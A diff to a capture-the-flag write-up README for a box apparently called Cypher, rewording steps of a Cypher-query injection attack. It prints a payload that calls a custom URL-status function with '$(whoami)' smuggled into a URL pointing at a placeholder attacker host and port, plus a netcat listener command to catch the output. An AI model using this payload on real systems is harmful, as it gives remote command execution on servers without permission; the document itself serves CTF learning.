aut0mateEverything/CTF-writeups/Cypher/README.md

 CALL custom.getUrlStatusCode("http://ip:port/?c=$(whoami)")
 ```

-### How this works?
 This payload uses custom function that tries to return a status code, but also executes command given at the end.

 ### How to use?

-Set up netcat listener on your port.
+1. Set up netcat listener on your port.

 ```bash
 nc -lnvp 4444
 ```

-Enter the payload and voilà, you just got yourself an RCE.
+2. Enter the payload into search query on the website.